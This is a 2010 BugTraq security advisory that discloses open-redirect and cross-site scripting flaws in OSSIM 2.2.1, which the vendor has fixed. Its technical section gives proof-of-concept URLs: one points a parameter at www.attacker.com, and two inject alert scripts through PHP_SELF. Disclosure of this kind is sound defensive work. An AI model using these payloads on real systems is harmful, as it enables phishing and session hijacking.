BugTraq
Multiple XSS vulnerabilities in OSSIM 2.2.1 Mar 31 2010 12:16PM
nicolas grandjean conix fr
================== Summary ==================

Multiple XSS vulnerabilities in OSSIM 2.2.1

Discovered by: CONIX Security (www.conix.fr)

Public Release Date: 3/31/2010

Vendor: Alienvault (www.alienvault.com)

Fixed: Yes (3/30/2010)

============= Technical Details =============

1. An attacker can redirect a victim to a malicious website by giving him a malicious URL, by social engineering or by phishing:

Example:

- http://ossim-server/ossim/nagios/index.php?sensor=www.attacker.com

The top links will then point to http://www.attacker.com

2. All the pages that contains the variable $_SERVER['PHP_SELF'] are vulnerable to an XSS:

Examples:

- http://ossim-server/ossim/control_panel/alarm_console.php/"><script>aler
t('xss')</script>

- http://ossim-server/ossim/control_panel/alarm_console.php/')"%20onMouseO
ver="alert('xss');//

- ...

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus